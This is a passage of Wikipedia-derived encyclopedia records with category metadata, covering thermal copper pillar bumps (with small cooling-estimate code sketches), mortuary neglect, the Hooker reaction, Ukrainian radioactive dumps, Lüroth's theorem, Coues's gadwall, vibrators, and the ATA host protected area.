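R = L / (sigma * A)            # electrical resistance of the TE layer, ohm
K = kappa * A / L              # thermal conductance of the TE layer, W/K
T_cold, dT = 300.0, 10.0       # cold-side temperature and bump delta-T, K

def q_cold(i_amps):
    """Net heat drawn from the cold side: Peltier term minus half the
    Joule heat minus conduction leaking back across the delta-T."""
    return S * T_cold * i_amps - 0.5 * i_amps**2 * R - K * dT

i_drive = 2.0                  # assumed drive current, A
q = q_cold(i_drive)
flux = q / (A * 1e4)           # W/cm^2 (1 m^2 = 1e4 cm^2)
print(f"net cooling: {q*1e3:.0f} mW per bump, ~{flux:.0f} W/cm^2")
```

With these placeholder values the model lands at the same order as the article's quoted 150 W/cm² figure; real devices are further limited by electrical and thermal contact resistances that this sketch omits.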
The number and density of thermal bumps are based on the heat load from the chip. Each P/N couple can provide a specific heat pumping (Q) at a specific temperature differential (ΔT) at a given electric current. Temperature sensors on the chip (“on board” sensors) can provide direct measurement of the thermal bump performance and provide feedback to the driver circuit. Precision temperature control Since thermal bumps can either cool or heat the chip depending on the current direction, they can be used to provide precision control of temperature for chips that must operate within specific temperature ranges irrespective of ambient conditions. For example, this is a common problem for many optoelectronic components. Hotspot cooling In microprocessors, graphics processors, and other high-end chips, hotspots can occur as power densities vary significantly across a chip. These hotspots can severely limit the performance of the devices. Because of the small size of the thermal bumps and the relatively high density at which they can be placed on the active surface of the chip, these structures are ideally suited for cooling hotspots. In such a case, the distribution of the thermal bumps may not need to be even. Rather, the thermal bumps would be concentrated in the area of the hotspot while areas of lower heat density would have fewer thermal bumps per unit area. In this way, cooling from the thermal bumps is applied only where needed, thereby reducing the added power necessary to drive the cooling and reducing the general thermal overhead on the system. Power generation In addition to chip cooling, thermal bumps can also be applied to high heat-flux interconnects to provide a constant, steady source of power for energy scavenging applications. Such a source of power, typically in the mW range, can trickle charge batteries for wireless sensor networks and other battery operated systems. References External links Kulicke & Soffa MCNC Aptos Technology Nextreme Thermal Solutions Amkor Technology Inc. White Papers, Articles and Application Notes Electronics manufacturing Semiconductors Thermodynamics
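The figures quoted in this article also permit a back-of-envelope sizing estimate for hotspot cooling. The sketch below uses the 238 μm bump diameter and the ~150 W/cm² pumping figure from the article; the hotspot load itself is a made-up example value.

```python
# Rough bump-count estimate for a hotspot, using figures from the article
# (238 um diameter, ~150 W/cm^2 pumping). The 3 W hotspot load is assumed.
import math

bump_d_cm = 238e-4                            # 238 um expressed in cm
bump_area_cm2 = math.pi * (bump_d_cm / 2)**2  # ~4.4e-4 cm^2 per bump
q_per_bump = 150.0 * bump_area_cm2            # ~67 mW pumped per bump

hotspot_watts = 3.0                           # assumed local hotspot load
print(math.ceil(hotspot_watts / q_per_bump))  # -> about 45 bumps
```

A few dozen bumps clustered over a multi-watt hotspot is consistent with the article's point that cooling can be concentrated where it is needed rather than spread uniformly across the die.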
Thermal copper pillar bump
[ "Physics", "Chemistry", "Materials_science", "Mathematics", "Engineering" ]
3,297
[ "Electrical resistance and conductance", "Physical quantities", "Semiconductors", "Materials", "Electronic engineering", "Condensed matter physics", "Thermodynamics", "Electronics manufacturing", "Solid state engineering", "Matter", "Dynamical systems" ]
16,438,268
https://en.wikipedia.org/wiki/Patient%20and%20mortuary%20neglect
Neglect is defined as giving little attention to something, or leaving it undone or unattended, especially through carelessness. Mortuary neglect can comprise many things, such as bodies being stolen from the morgue, or bodies being mixed up so that the wrong one is buried. When a mortuary fails to preserve a body correctly, it could also be considered neglect because of the consequences. Patient neglect is similar to mortuary neglect, with one major difference: patient neglect has to do with people who are still living, and that neglect could ultimately lead to their death. Patient neglect concerns people in hospitals, in nursing homes, or being cared for at home. Usually in nursing homes or home-assisted living, neglect consists of patients being left lying in their own urine and/or feces, which could, in turn, possibly attract flesh flies and lead to maggot infestation. It also encompasses patients getting rashes, lice, and other sores from being improperly cared for. Types of mortuary neglect and the law The general sign of mortuary neglect (in terms of forensic entomology) is an infestation of a corpse by maggots or some other insect (such as cockroaches). This should not be confused with insects found on a body before it is transferred to the morgue. The following examples are forms of mortuary neglect that pertain to the ethical treatment of a corpse. Improper embalming Improper embalming is the utilization of embalming techniques that cause premature decomposition of the body, especially in cases where the body in question is to be presented in an open-casket funeral. In addition, not refrigerating the body immediately following death, but before the embalming process, can lead to rapid deterioration of the human remains as well. Washington v. John T. Rhines Co. On August 29, 1994, widow Marian Washington filed suit against a funeral home, John T. Rhines Co., for improperly embalming her late husband Vernon W. Washington. She claimed that the embalming fluid was leaking and that her husband's skin was decomposing at an alarming rate. John T. Rhines Co. re-embalmed Mr. Washington in an effort to make his body presentable. However, they failed to restore Mr. Washington's body completely. Cooley v. State Board of Funeral Directors and Embalmers On May 3, 1956, Cooley, a funeral home operator, petitioned for review of the revocation of his license by the California state board of funeral directors and embalmers. The case reveals the reasons the license was revoked. Cooley's practices were described as unsanitary for the following reasons: an infant was discovered improperly embalmed after maggots were found seeping out of its orifices, bodies were commingled, blood stains were found on the walls, and tools were not cleaned from one autopsy to the next. Needless to say, the appeal was not granted. Fencing stolen organs This form of abuse consists of selling body parts stolen from corpses that are sent to the morgue for embalming. Commingling of ashes Commingling of ashes is putting several bodies in the same crematorium during the same burn cycle. This act undermines the respect due a passed loved one. Unauthorized disposal In this form of abuse, funeral home operators dispose of the body in a manner not authorized by the deceased's loved ones. Christensen v. Superior Court of Los Angeles County On June 28, 1990, a court heard a case on a class action suit against multiple funeral service operators.
These acts included all of the types of mortuary neglect mentioned above in this section. The case contended that the defendants' treatment of the deceased violated conscionable standards. This practice occurred for nearly a decade and victimized approximately 17,000 decedents and their families. Unethical treatment of the deceased Any violation of the standards of care that a reasonable person would expect of a mortuary operator could be considered in this category. Dennis v. Robbins Funeral Home James Dennis, widower of Molly Dennis, sued Robbins Funeral Home on August 24, 1987. Before Mrs. Dennis was to be cremated, Lee Miller, the funeral director of Robbins Funeral Home, called the family to see the body. When the family arrived, to their dismay, they found Molly Dennis's body unprofessionally presented in an unhygienic environment, with unspecified limbs hanging off the dissection table and into a dirty sink. Mr. Dennis was not, however, able to successfully sue the funeral home, because the judicial history in the area did not include a precedent for funeral home malpractice. National Funeral Directors Association The National Funeral Directors Association (NFDA) is an organization in the United States that regulates mortuaries and morgues and their activities regarding the embalming and interring of the deceased. For any complaint, including one of mortuary neglect, the NFDA has a fifteen-step disciplinary process it goes through to determine the severity of the situation. After receiving a complaint, a committee reviews the situation, investigating if necessary, and then determines the consequences of the violation. Those found in violation of the NFDA's policies can face punitive action ranging from a warning to suspension from the organization. Trends Certain segments of the health care industry are seeing downward trends in neglect, while others are experiencing unfortunate growth. In modern hospitals the most prevalent form of neglect involves patients neglecting their own care. However, in other segments, such as assisted living for mentally deficient patients, the rates of abuse and neglect are still relatively high. Mortuary neglect shows peculiar trends of its own. Relatively few morticians simply refuse to perform their duties; however, cases of ethically questionable practices can easily be found. Morticians preserving only visible body parts, incomplete embalming, and the defrauding of families are just a few examples of reported cases of neglect. Increasingly, medical journals are recommending that doctors become more active in attempting to persuade parents and guardians of children to accept or continue treatment for diseases or injuries in order to avoid a neglect case. In the American Orthopedic Journal, a case study was presented in which a doctor suggested making an effort to convince a girl's mother to adequately treat a case of amblyopia in order to avoid potential neglect. While one viewpoint argued this was unnecessary, it shows a growing trend to go beyond traditional measures to avoid neglect charges. History From the times of the ancient Egyptians, cases of mortuary neglect have been recorded. The process of embalming is meant to preserve the dead for burial, as the Egyptians believed the afterlife was just as important as life itself. However, if a woman was married to an embalmer, he would likely keep her preserved for his own benefit until obvious decomposition took place.
Dignity for the dead is now a legal matter, as patient neglect has always been. Abuse in the healthcare system is another huge problem in today's society. Nursing homes and hospitals are preying grounds for predators of the weak and disabled. In 2001 a nursing home in Ossining, New York was closed because of neglect and unsafe conditions that existed for the patients. US state laws For the most part, mortuary standards are created by the states, not by the federal government. The following are links to state policies (where available) on mortuary practices: Arizona Arkansas California Colorado Connecticut Delaware Florida Hawaii Idaho Iowa Kansas Louisiana Maine Maryland Massachusetts Michigan Minnesota Mississippi Missouri Montana Nebraska New Hampshire New Jersey New Mexico Ohio Oklahoma Oregon Rhode Island South Dakota Tennessee Texas Vermont Virginia Washington Wyoming References External links Summary of Violations. Texas Funeral Service Commission. 18 March 2008 Abuse Legal aspects of death
Patient and mortuary neglect
[ "Biology" ]
1,582
[ "Abuse", "Behavior", "Aggression", "Human behavior" ]
16,438,537
https://en.wikipedia.org/wiki/Hooker%20reaction
In the Hooker reaction (1936), an alkyl side chain on a certain naphthoquinone (a phenomenon first observed in the compound lapachol) is shortened by one methylene unit, lost as carbon dioxide, in each potassium permanganate oxidation. Mechanistically, oxidation causes ring cleavage at the alkene group and extrusion of carbon dioxide by decarboxylation, with subsequent ring closure. References Organic reactions Name reactions Degradation reactions Homologation reactions
Hooker reaction
[ "Chemistry" ]
97
[ "Name reactions", "Degradation reactions", "Organic reactions" ]
16,440,097
https://en.wikipedia.org/wiki/Prydniprovsky%20Chemical%20Plant%20radioactive%20dumps
The now-defunct Prydniprovsky Chemical Plant (Prydniprovsky khimichnyi zavod, PHZ, also PChP) in the city of Kamianske, Ukraine, processed uranium ore for the Soviet nuclear program from 1948 through 1991, preparing yellowcake. Its processing wastes are now stored in nine open-air dumping grounds containing about 36 million tonnes of sand-like, low-level radioactive residue, occupying an area of 2.5 million square meters. The sites, improperly constructed from the very beginning, were abandoned by the industry long ago and remain in very poor condition. The top concern is the dumps' proximity to both the large Dnieper River and city residential areas. According to government experts, the dams separating the grounds from soil water are already leaking, polluting the Dnieper basin. It is believed that further deterioration of the dams, irrespective of any outside accidents, could cause a devastating radioactive mudslide. The Ukrainian government is now tightening control over the grounds and seeking international aid for projects aimed at securing and gradually reprocessing the PHZ wastes. Recently, the International Atomic Energy Agency has evaluated the condition of the sites and is considering dispatching a major observation and aid mission to Kamianske. From 1946 to 1972, the company was engaged in uranium ore concentration (production of uranium oxide concentrate) - the plant processed 65% of the uranium ores in the Soviet Union. Attempts to recycle fuel elements began in 1974, but due to the growing number of oncological diseases in the city, the idea was abandoned. The isolated dump grounds (about nine altogether, at a depth of 3 m) of the former plant are now located in different parts of the city and operated by the purpose-created "Barrier" State Enterprise - a new name whose meaning is obscure and which has yet to become widely known. That is why the sites, the company, and the whole problem are still commonly referred to as the "Prydniprovsky Chemical Plant (PHZ) wastes". In 1964 the first treatment facilities appeared at the enterprise. In 2003, the Cabinet of Ministers approved an 11-year program on "bringing hazardous facilities of the Prydniprovsky Chemical Plant to an environmentally safe state and ensuring protection of the population from the harmful effects of ionizing radiation". See also Threat of the Dnieper reservoirs References Environment of Ukraine Nuclear technology in Ukraine Kamianske Radioactive waste Chemical engineering Dnieper basin Chemical companies of Ukraine Nuclear technology in the Soviet Union Chemical companies of the Soviet Union Government-owned companies of Ukraine
Prydniprovsky Chemical Plant radioactive dumps
[ "Physics", "Chemistry", "Technology", "Engineering" ]
535
[ "Nuclear physics", "Chemical engineering", "Nuclear chemistry stubs", "Nuclear and atomic physics stubs", "Environmental impact of nuclear power", "Radioactivity", "nan", "Hazardous waste", "Radioactive waste" ]
16,440,164
https://en.wikipedia.org/wiki/L%C3%BCroth%27s%20theorem
In mathematics, Lüroth's theorem asserts that every field that lies between a field K and the rational function field K(X) must be generated as an extension of K by a single element of K(X). This result is named after Jacob Lüroth, who proved it in 1876. Statement Let K be a field and M be an intermediate field between K and K(X), for some indeterminate X. Then there exists a rational function f(X) in K(X) such that M = K(f(X)). In other words, every intermediate extension between K and K(X) is a simple extension. Proofs The proof of Lüroth's theorem can be derived easily from the theory of rational curves, using the geometric genus. This method is non-elementary, but several short proofs using only the basics of field theory have long been known, mainly using the concept of transcendence degree. Many of these simple proofs use Gauss's lemma on primitive polynomials as a main step. References Algebraic varieties Birational geometry Field (mathematics) Theorems in algebraic geometry
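A routine worked instance (an illustration, not taken from the article): the fixed field of the automorphism of K(X) sending X to 1/X is an intermediate field, and a Lüroth generator for it can be exhibited directly.

```latex
% Illustrative example, not from the article: take the intermediate field
%   M = K(X + 1/X),  so that  K \subseteq M \subseteq K(X).
% X is algebraic of degree 2 over M, since it is a root of
\[
  T^{2} - \Bigl(X + \tfrac{1}{X}\Bigr)\,T + 1 = 0 ,
\]
% hence [K(X) : M] = 2, and M is generated over K by the single
% rational function f(X) = X + 1/X, exactly as Lüroth's theorem predicts.
```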
Lüroth's theorem
[ "Mathematics" ]
205
[ "Theorems in algebraic geometry", "Theorems in geometry" ]
7,448,577
https://en.wikipedia.org/wiki/Coues%27s%20gadwall
Coues's gadwall (Mareca strepera couesi), or the Washington Island gadwall, is an extinct dabbling duck which is known only from two immature specimens from the Pacific island of Teraina, Line Islands, Kiribati. They are in the National Museum of Natural History in Washington, D.C. The bird was named in honor of Elliott Coues. Description A male and a female are known, which resemble the immature appearance of the common gadwall except for the black bill with a higher number of filtering lamellae, black feet, and the much smaller size (which may be due to the birds not being fully grown). The male resembles a male common gadwall in eclipse plumage, save for some white speckling on the breast and back. The female looks like a small common gadwall female; the primary wing coverts were not patterned black, and the inner web of the secondary remiges was grey instead of white. Measurements are: wing, 19.9 cm; bill, 3.7 cm; tarsus, 3.6 cm. This means the birds were the size of a Cape teal or a garganey, with a total length of 40–45 cm. As the birds were not fully adult when shot, it is not clear whether they would have grown somewhat larger. Status and extinction The status of this bird is controversial. While many scientists consider it a dwarf subspecies of the common gadwall (Anas strepera strepera), others argue that the two individuals might have been just juveniles of a local breeding population that might not even have been taxonomically distinct. The common gadwall is a known vagrant to the Tuamotu Islands (Kolbe wrote "Tahiti", which is a misreading of Greenway) and Hawaii, for example, which are about the same distance from the species' breeding grounds as is Teraina (which, moreover, lies in between these two groups). This makes it entirely possible that the two Coues's gadwalls that were shot were just the offspring of a few vagrant common gadwalls, maybe settling there after being wounded by hunters. On the other hand, Streets' reports suggest that a population of these ducks of some size was present, and thus they may have lived there for quite some time and indeed be worthy of recognition as a distinct taxon. The observations of the two individuals took place in January 1874. The subspecies' description was by Thomas Hale Streets (1847–1925) in 1876. Streets reported on the two immatures he shot, which were found in a peat bog. The cause of its extinction might be the extensive hunting by settlers of Tabuaeran (Fanning Island), who shot large numbers of migrant ducks on both Teraina and Tabuaeran each year. W. G. Anderson, a local resident, stated in 1926 that, growing up on Teraina and Tabuaeran around the turn of the century, he had never encountered a native population of gadwalls on Teraina. Thus, the subspecies' disappearance can be fixed to the last quarter of the 19th century, between the mid-1870s and 1900. Notes References Further reading Fuller, Errol (2000): Extinct Birds (2nd ed.). Oxford University Press, Oxford, New York. Coues's gadwall Ducks Controversial bird taxa Bird extinctions since 1500 Coues's gadwall Coues's gadwall Extinct birds of Oceania
Coues's gadwall
[ "Biology" ]
722
[ "Biological hypotheses", "Controversial bird taxa", "Controversial taxa" ]
7,449,035
https://en.wikipedia.org/wiki/Vibrator%20%28mechanical%29
A vibrator is a mechanical device that generates vibrations. The vibration is often produced by an electric motor with an unbalanced mass on its driveshaft. There are many different types of vibrator. Typically, they are components of larger products such as smartphones, pagers, or video game controllers with a "rumble" feature. Vibrators as components When smartphones and pagers vibrate, the vibrating alert is produced by a small component that is built into the phone or pager. Many older, non-electronic buzzers and doorbells contain a component that vibrates for the purpose of producing a sound. Tattoo machines and some types of electric engraving tools contain a mechanism that vibrates a needle or cutting tool. Aircraft stick shakers use a vibrating mechanism attached to the pilots' control yokes to provide a tactile warning of an impending aerodynamic stall. Eccentric rotating mass (ERM) vibrators work by rotating a deliberately unbalanced (eccentric) weight. Linear resonant actuators (LRAs) work by repeatedly moving a weight from one side of the actuator to the other, using a coil acting as an electromagnet. Coin vibration motors have the shape of a coin and are often of the ERM type. Industrial vibrators Vibrators are used in many different industrial applications, both as components and as individual pieces of equipment. Bowl feeders, vibratory feeders and vibrating hoppers are used extensively in the food, pharmaceutical, and chemical industries to move and position bulk material or small component parts. The application of vibration working with the force of gravity can often move materials through a process more effectively than other methods. Vibration is often used to position small components so that they can be gripped mechanically by automated equipment, as required for assembly. Vibrating screens are used to separate bulk materials in a mixture of different sized particles. For example, sand, gravel, river rock and crushed rock, and other aggregates are often separated by size using vibrating screens. Vibrating compactors are used for soil compaction, especially in foundations for roads, railways, and buildings. Concrete vibrators consolidate freshly poured concrete so that trapped air and excess water are released and the concrete settles firmly in place in the formwork. Improper consolidation of concrete can cause product defects, compromise the concrete's strength, and produce surface blemishes such as bug holes and honeycombing. An internal concrete vibrator is a steel cylinder about the size of the handle of a baseball bat, with a hose or electrical cord attached to one end. The vibrator head is immersed in the wet concrete. External concrete vibrators attach, via a bracket or clamp system, to the concrete forms. There is a wide variety of external concrete vibrators available, and some vibrator manufacturers have bracket or clamp systems designed to fit the major brands of concrete forms. External concrete vibrators are available in hydraulic, pneumatic or electric power. Vibrating tables or shake tables are sometimes used to test products to determine or demonstrate their ability to withstand vibration. Testing of this type is commonly done in the automotive, aerospace, and defense industries. These machines are capable of producing three different types of vibration profile: sine sweep, random vibration, and synthesized shock.
In all three of these applications, the part under test will typically be instrumented with one or more accelerometers to measure component response to the vibration input. A sine sweep vibration profile typically starts at a low frequency and increases in frequency (measured in hertz) at a set rate. The vibratory amplitude, as measured in g, may increase or decrease as well. A sine sweep will find resonant frequencies in the part. A random vibration profile excites different frequencies along a spectrum at different times. Significant calculation goes into making sure that all frequencies get excited to within an acceptable tolerance band. A random vibration test suite may range anywhere from 30 seconds up to several hours. It is intended to synthesize the effect of, for example, a car driving over rough terrain or a rocket taking off. A synthesized shock pulse is a short-duration, high-level vibration calculated as a sum of many half-sine waves covering a range of frequencies. It is intended to simulate the effects of an impact or explosion. A shock pulse test typically lasts less than a second. Vibrating tables can also be used in the packaging process in material handling industries to shake or settle a container so it can hold more product. References Electric motors Mechanical vibrations
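To make the sine-sweep profile described above concrete, here is a minimal sketch (Python with NumPy; the frequency range, duration, and sample rate are arbitrary example values rather than any test standard) that generates a constant-amplitude logarithmic sweep of the kind used to hunt for resonances.

```python
import numpy as np

def log_sine_sweep(f0, f1, duration, sample_rate=8000.0):
    """Constant-amplitude sine sweep whose instantaneous frequency rises
    exponentially from f0 to f1 Hz over `duration` seconds."""
    t = np.arange(0.0, duration, 1.0 / sample_rate)
    k = (f1 / f0) ** (1.0 / duration)   # per-second frequency multiplier
    # Instantaneous frequency f(t) = f0 * k**t; the phase is its integral.
    phase = 2.0 * np.pi * f0 * (k**t - 1.0) / np.log(k)
    return t, np.sin(phase)

# Example: sweep 10 Hz to 2 kHz over 60 seconds.
t, drive = log_sine_sweep(10.0, 2000.0, 60.0)
```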
Vibrator (mechanical)
[ "Physics", "Technology", "Engineering" ]
918
[ "Structural engineering", "Engines", "Electric motors", "Mechanics", "Mechanical vibrations", "Electrical engineering" ]
7,449,188
https://en.wikipedia.org/wiki/Vibrator%20%28electronic%29
A vibrator is an electromechanical device that takes a DC electrical supply and converts it into pulses that can be fed into a transformer. It is similar in purpose (although greatly different in operation) to the solid-state power inverter. Before the development of switch-mode power supplies and the introduction of semiconductor devices operating off low voltage, there was a requirement to generate voltages of about 50 to 250 V DC from a vehicle's battery. A vibrator was used to provide pulsating DC which could be converted to a higher voltage with a transformer, rectified, and filtered to create higher-voltage DC. The vibrator is essentially a relay whose normally closed contacts feed power to its own coil: when the coil energizes, it opens the contacts and cuts its own power; the contacts then spring closed again, and the cycle repeats. This happens so rapidly that the armature vibrates, and it sounds like a buzzer. The same rapidly pulsing contacts apply the rising and falling DC voltage to the transformer, which can step it up to a higher voltage. The primary use for this type of circuit was to operate vacuum tube radios in vehicles, but it also saw use with other mobile electronic devices with a 6 or 12 V accumulator, especially in places with no mains electricity supply such as farms. These vibrator power supplies became popular in the 1940s, replacing bulkier motor-generator systems for the generation of AC voltages for such applications. Vacuum tubes require plate voltages ranging from about 45 volts to 250 volts in electronic devices such as radios. For portable radios, hearing aids and similar equipment, B batteries were manufactured with various voltage ratings. In order to provide the necessary voltage for a radio from the typical 6 or 12 volt DC supply available in a car or from a farm lighting battery, it was necessary to convert the steady DC supply to a pulsating DC and use a transformer to increase the voltage. Vibrators, being constantly in motion, often experienced mechanical malfunctions, such as the springs losing tension and the contact points wearing down. As tubes began to be replaced by transistor-based electrical systems, the need to generate such high voltages diminished. Mechanical vibrators fell out of production near the end of the 20th century, but solid-state electronic vibrators are still manufactured to be backwards compatible with older units. Use The vibrator was a device with switch contacts mounted at the ends of flexible metal strips. In operation, these strips are vibrated by an electromagnet, causing the contacts to open and close rapidly. The contacts interrupt the 6 or 12 V direct current from the battery to form a stream of pulses which change back and forth between 0 volts and the battery voltage, effectively generating a square wave. Unlike a steady direct current, when such a pulsating current is applied to the primary winding of a transformer it will induce an alternating current in the secondary winding, at a pre-determined voltage based on the turns ratio of the windings. This current can then be rectified by a thermionic diode, a copper-oxide/selenium rectifier, or by an additional set of mechanical contacts (in which case the vibrator acts as a type of synchronous rectifier). The rectified output is then filtered, ultimately producing a DC voltage typically much higher than the battery voltage, with some losses dissipated as heat. This arrangement is essentially an electromechanical inverter circuit.
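The step-up arithmetic is simple and worth making explicit. The sketch below is a first-order sizing estimate under stated assumptions (an ideal transformer, a fixed drop at the vibrating contacts, and a single rectifier drop); the specific numbers are illustrative, not taken from any particular radio.

```python
# First-order vibrator-supply sizing sketch. Assumes an ideal transformer,
# a fixed contact drop, and a single rectifier drop; values are illustrative.
def plate_supply_volts(v_battery, turns_ratio,
                       contact_drop=0.2, rectifier_drop=0.7):
    """Approximate filtered DC output of a vibrator power supply."""
    v_primary = v_battery - contact_drop   # lost across vibrating contacts
    return v_primary * turns_ratio - rectifier_drop

# A 6 V battery and a ~1:40 step-up lands in vacuum-tube plate territory:
print(plate_supply_volts(6.0, 40.0))   # -> roughly 230 V before load sag
```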
The vibrator's primary contacts alternately make and break current supply to the transformer primary. As it is impossible for the vibrator's contacts to change over instantaneously, the collapsing magnetic field in the core will induce a high voltage in the windings and will cause sparking at the vibrator's contacts. This would erode the contacts very quickly, so a snubber capacitor with a high voltage rating (C8 in the diagram) is added across the transformer secondary to damp out the unwanted high-voltage "spikes". Since vibrators wore out over time, they were usually encased in a steel or aluminum "tin can" enclosure with a multi-pin plug at the bottom (similar to the contact pins on vacuum tubes), so they could be quickly unplugged and replaced without using tools. Vibrators generate a certain amount of audible noise (a constant buzzing sound) while in operation, which could potentially be heard by passengers in the car while the radio was on. To help contain this sound within the vibrator's enclosure, the inside surface of the can was often lined with a thick soundproofing material, such as foam rubber. Since vibrators were typically plugged into sockets mounted directly on the radio chassis, the vibration could potentially be mechanically coupled to the chassis, causing it to act as a sounding-board for the noise. To prevent this, the sound-deadening lining inside the can was sometimes made thick enough to support the vibrator's components by friction alone. The components were then connected to the plug pins by flexible wires, to further isolate the vibration from the plug. See also Boost converter Chopper Mechanical rectifier Multivibrator Reed relay Switched-mode power supply References Electric power conversion Electrical components
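The role of the snubber capacitor discussed above can also be illustrated numerically. When the contacts open, the energy stored in the transformer's leakage inductance, 0.5*L*I^2, transfers into the capacitance, 0.5*C*V^2, so the spike peaks near V = I*sqrt(L/C); a larger capacitor therefore trades a slower voltage swing for a lower peak. All component values below are assumptions chosen for illustration.

```python
# Energy-balance estimate of the voltage spike at contact opening:
# 0.5*L*I^2 = 0.5*C*V^2  =>  V_peak ~= I * sqrt(L / C).
# L, I, and the candidate capacitors are illustrative assumptions.
import math

L_leakage = 5e-3   # leakage inductance seen by the capacitor, H (assumed)
I_break = 0.05     # current interrupted at the contacts, A (assumed)

for C in (1e-9, 4.7e-9, 22e-9):
    v_peak = I_break * math.sqrt(L_leakage / C)
    print(f"C = {C:.1e} F -> spike peaks near {v_peak:.0f} V")
```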
Vibrator (electronic)
[ "Technology", "Engineering" ]
1,089
[ "Electrical engineering", "Electrical components", "Components" ]
7,449,438
https://en.wikipedia.org/wiki/Micro-loop%20heat%20pipe
A micro-loop heat pipe or MLHP is a miniature loop heat pipe in which the radius of curvature of the liquid meniscus in the evaporator is of the same order of magnitude as the dimensions of the micro-grooves, or a miniature loop heat pipe which has been fabricated using microfabrication techniques. References Cooling technology Microtechnology
Micro-loop heat pipe
[ "Materials_science", "Engineering" ]
71
[ "Materials science", "Microtechnology" ]
7,450,068
https://en.wikipedia.org/wiki/List%20of%20ATI%20chipsets
This is a comparison of chipsets, manufactured by ATI Technologies. For AMD processors Comparison of Northbridges Comparison of Southbridges For Intel processors Comparison of Northbridges Comparison of Southbridges See also List of Intel chipsets Comparison of AMD chipsets Comparison of Nvidia chipsets List of VIA chipsets Comparison of AMD graphics processing units Comparison of Nvidia graphics processing units External links Intel chipset solutions AMD chipset solutions ATI Chipsets ATI Chipsets
List of ATI chipsets
[ "Technology" ]
102
[ "Computing comparisons" ]
7,450,714
https://en.wikipedia.org/wiki/Host%20protected%20area
The host protected area (HPA) is an area of a hard drive or solid-state drive that is not normally visible to an operating system. It was first introduced in the ATA-4 standard CXV (T13) in 2001. How it works The IDE controller has registers that contain data that can be queried using ATA commands. The data returned gives information about the drive attached to the controller. There are three ATA commands involved in creating and using a host protected area: IDENTIFY DEVICE, SET MAX ADDRESS, and READ NATIVE MAX ADDRESS. Operating systems use the IDENTIFY DEVICE command to find out the addressable space of a hard drive. The IDENTIFY DEVICE command queries a particular register on the IDE controller to establish the size of a drive. This register, however, can be changed using the SET MAX ADDRESS ATA command. If the value in the register is set to less than the actual hard drive size, then effectively a host protected area is created. It is protected because the OS will work with only the value in the register that is returned by the IDENTIFY DEVICE command and thus will normally be unable to address the parts of the drive that lie within the HPA. The HPA is useful only if other software or firmware (e.g. BIOS or UEFI) is able to use it. Software and firmware that are able to use the HPA are referred to as 'HPA aware'. The ATA command that these entities use is called READ NATIVE MAX ADDRESS. This command accesses a register that contains the true size of the hard drive. To use the area, the controlling HPA-aware program changes the value of the register read by IDENTIFY DEVICE to that found in the register read by READ NATIVE MAX ADDRESS. When its operations are complete, the register read by IDENTIFY DEVICE is returned to its original fake value. Use At the time HPA was first implemented in hard-disk firmware, some BIOSes had difficulty booting with large hard disks. An initial HPA could then be set (by some jumpers on the hard disk) to limit the number of cylinders to 4095 or 4096 so that the older BIOS would start. It was then the job of the bootloader to reset the HPA so that the operating system would see the full hard-disk storage space. HPA can be used by various booting and diagnostic utilities, normally in conjunction with the BIOS. An example of this implementation is the Phoenix FirstBIOS, which uses Boot Engineering Extension Record (BEER) and Protected Area Run Time Interface Extension Services (PARTIES). Another example is the Gujin installer, which can install the bootloader in BEER, naming that pseudo-partition /dev/hda0 or /dev/sdb0; then only cold boots (from power-down) will succeed, because warm boots (from Control-Alt-Delete) will not be able to read the HPA. Computer manufacturers may use the area to contain a preloaded OS for install and recovery purposes (instead of providing DVD or CD media). Dell notebooks hide the Dell MediaDirect utility in the HPA. IBM ThinkPad and LG notebooks hide system restore software in the HPA. The HPA is also used by various theft recovery and monitoring service vendors. For example, the laptop security firm CompuTrace uses the HPA to load software that reports to their servers whenever the machine is booted on a network. The HPA is useful to them because even when a stolen laptop has its hard drive formatted, the HPA remains untouched. The HPA can also be used to store data that is deemed illegal and is thus of interest to government and police computer forensics teams. Some vendor-specific external drive enclosures (e.g.
Maxtor, owned by Seagate since 2006) are known to use the HPA to limit the capacity of unknown replacement hard drives installed into the enclosure. When this occurs, the drive may appear to be limited in size (e.g. 128 GB), which can look like a BIOS or dynamic drive overlay (DDO) problem. In this case, one must use software utilities (see below) that use READ NATIVE MAX ADDRESS and SET MAX ADDRESS to change the drive's reported size back to its native size, and avoid using the external enclosure again with the affected drive. Some rootkits hide in the HPA to avoid being detected by anti-rootkit and antivirus software. Some NSA exploits use the HPA for application persistence. Identification and manipulation Identification of an HPA on a hard drive can be achieved by a number of tools and methods: ATATool by Data Synergy EnCase by Guidance Software Forensic Toolkit by Access Data hdparm by Mark Lord The Sleuth Kit (free, open software) by Brian Carrier (HPA identification is currently only supported on Linux.) Note that the HPA feature can be hidden by DCO commands (according to the documentation, only if the HPA is not in use), and can be "frozen" (until the next power-down of the hard disk) or password-protected. See also Device Configuration Overlay (DCO) GUID Partition Table (GPT) Master boot record (MBR) References External links The Sleuth Kit International Journal of Digital Evidence Dublin City University Security & Forensics wiki Wiki Web For ThinkPad Users AT Attachment Computer forensics Computer security procedures Information technology audit
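In practice, the IDENTIFY DEVICE versus READ NATIVE MAX ADDRESS comparison described above is what hdparm's -N option reports. A minimal sketch follows (Python on Linux, shelling out to hdparm and assuming 512-byte logical sectors; the exact output format parsed here may vary between hdparm versions, so treat it as an assumption).

```python
# Sketch: detect an HPA by comparing current vs. native max sectors via
# "hdparm -N". Assumes Linux, hdparm installed, root privileges, and
# 512-byte logical sectors; the parsed output format may vary by version.
import re
import subprocess

def hpa_sectors(device="/dev/sda"):
    out = subprocess.run(["hdparm", "-N", device], capture_output=True,
                         text=True, check=True).stdout
    m = re.search(r"max sectors\s*=\s*(\d+)/(\d+)", out)
    if not m:
        raise ValueError(f"unexpected hdparm output:\n{out}")
    current, native = (int(g) for g in m.groups())
    return native - current          # 0 means no HPA is set

hidden = hpa_sectors()
print(f"hidden area: {hidden} sectors (~{hidden * 512 / 2**20:.1f} MiB)")
```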
Host protected area
[ "Engineering" ]
1,104
[ "Cybersecurity engineering", "Computer security procedures", "Computer forensics" ]
7,451,513
https://en.wikipedia.org/wiki/Alex%20Pentland
